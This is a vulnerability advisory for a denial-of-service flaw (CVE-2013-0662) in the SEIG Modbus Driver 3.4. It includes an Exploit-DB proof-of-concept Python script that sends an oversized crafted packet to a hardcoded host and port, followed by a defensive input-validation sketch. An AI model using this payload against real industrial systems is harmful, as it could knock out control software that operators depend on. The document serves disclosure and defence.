Vendor: SEIG Modbus Driver
By: Alejandro Parodi
CVSS: 7.5 (HIGH)
Type: Denial of Service
CWE: 20
Product Name: SEIG Modbus Driver
Affected Version From: v3.4
Affected Version To: v3.4
Patch Exists: YES
Related CVE: CVE-2013-0662
CPE: a:schneider_electric:seig_modbus_driver:3.4
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows7 x86
2018

SEIG Modbus 3.4 – Denial of Service (PoC)

A denial of service vulnerability exists in SEIG Modbus 3.4 due to improper validation of user-supplied input. An attacker can send a specially crafted packet to the vulnerable server, resulting in a denial of service condition.

Mitigation:

Apply the latest security patches from the vendor to mitigate this vulnerability.

Exploit-DB raw data:

# Title: SEIG Modbus 3.4 - Denial of Service (PoC)
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4
# Version: v3.4
# Tested on: Windows7 x86
# CVE: CVE-2013-0662
# References: 
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662

import socket
import struct
import time

ip = "192.168.127.137"
port = 27700
con = (ip, port)

header_padding = "\x00\xAA"
header_buffer_size = "\xFF\xFF"
header_recv_len = "\x08\xDD" # (header_buffer_size + 1 in the last byte because one is subtracted from it)
header_end = "\xFF"

header = header_padding + header_buffer_size + header_recv_len + header_end
message = "\x00\x64" + "A" * 2267

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(con)
s.send(header)
s.send(message)
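
The missing input validation, seen from the receiving side: the sketch below is an added example, not code from the vendor or from the PoC author. It bounds both declared lengths before any payload is read. The 7-byte big-endian layout is inferred from the PoC's variable names, and MAX_PAYLOAD, FrameError, parse_header, read_frame and is_rejected are hypothetical names and values.

```python
import io
import struct

# Assumed layout, inferred from the PoC's variable names (not vendor docs):
# padding (2 bytes), buffer size (2), receive length (2), end marker (1).
HEADER_FMT = ">HHHB"
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 7 bytes
MAX_PAYLOAD = 1024  # hypothetical capacity of the receiver's fixed buffer

class FrameError(ValueError):
    """The frame must be dropped before any payload byte is copied."""

def parse_header(raw, max_payload=MAX_PAYLOAD):
    """Return the declared payload length, or raise FrameError."""
    if len(raw) != HEADER_LEN:
        raise FrameError("short header: %d bytes" % len(raw))
    _pad, buffer_size, recv_len, _end = struct.unpack(HEADER_FMT, raw)
    # Both lengths are attacker-controlled: bound them against the real
    # buffer capacity, never against each other alone.
    if buffer_size > max_payload or recv_len > max_payload:
        raise FrameError("declared length exceeds %d bytes" % max_payload)
    if recv_len > buffer_size:
        raise FrameError("receive length larger than declared buffer")
    return recv_len

def read_frame(stream, max_payload=MAX_PAYLOAD):
    """Read one frame from a file-like stream, enforcing the bounds."""
    recv_len = parse_header(stream.read(HEADER_LEN), max_payload)
    payload = stream.read(recv_len)
    if len(payload) != recv_len:
        raise FrameError("truncated payload")
    return payload

def is_rejected(frame):
    """True when read_frame refuses the frame."""
    try:
        read_frame(io.BytesIO(frame))
    except FrameError:
        return True
    return False

# Header bytes as sent by the PoC above, and a constructed well-formed frame.
POC_HEADER = bytes.fromhex("00aaffff08ddff")
BENIGN = struct.pack(HEADER_FMT, 0x00AA, 16, 4, 0xFF) + b"\x00\x64AB"

if __name__ == "__main__":
    print(is_rejected(POC_HEADER), read_frame(io.BytesIO(BENIGN)))
```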